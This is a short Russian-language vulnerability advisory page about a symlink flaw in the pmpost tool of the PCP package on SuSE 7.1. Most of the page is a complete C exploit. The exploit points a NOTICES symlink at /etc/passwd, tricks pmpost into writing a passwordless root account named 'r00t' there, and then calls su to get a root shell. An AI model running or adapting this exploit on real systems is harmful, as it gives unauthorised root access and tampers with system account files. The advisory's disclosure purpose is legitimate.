Security Lab

Проблема символьных линков в pmpost

Дата публикации:20.06.2001
Дата изменения:17.10.2006
Всего просмотров:1819
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Проблема символьных линков найдена в pcp пакете от CGI, в компоненте pmpost. Уязвимость работает в SuSE 7.1.



Эксплоит:

#include <stdio.h>

#include <sys/types.h>

#include <sys/wait.h>

#include <fcntl.h>

#include <sys/stat.h>

main()

{

const char *bin="/usr/share/pcp/bin/pmpost";

static char buf[512];

static char dir[128];





srand(time(NULL));

sprintf(dir, "/tmp/dupa.%.8d", rand());



if(mkdir(dir, S_IRWXU))

_exit(2);



if(chdir(dir))

_exit(3);



if(symlink("/etc/passwd", "./NOTICES"))

_exit(4);



snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);



if(putenv(buf))

_exit(5);



if(!fork()) {

execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);

_exit(1);

}

else {

waitpid(0, NULL, WUNTRACED);

chdir("..");

sprintf(buf, "rm -rf dupa.*");

system(buf);

execl("/bin/su", "/bin/su", "r00t", NULL);

}

}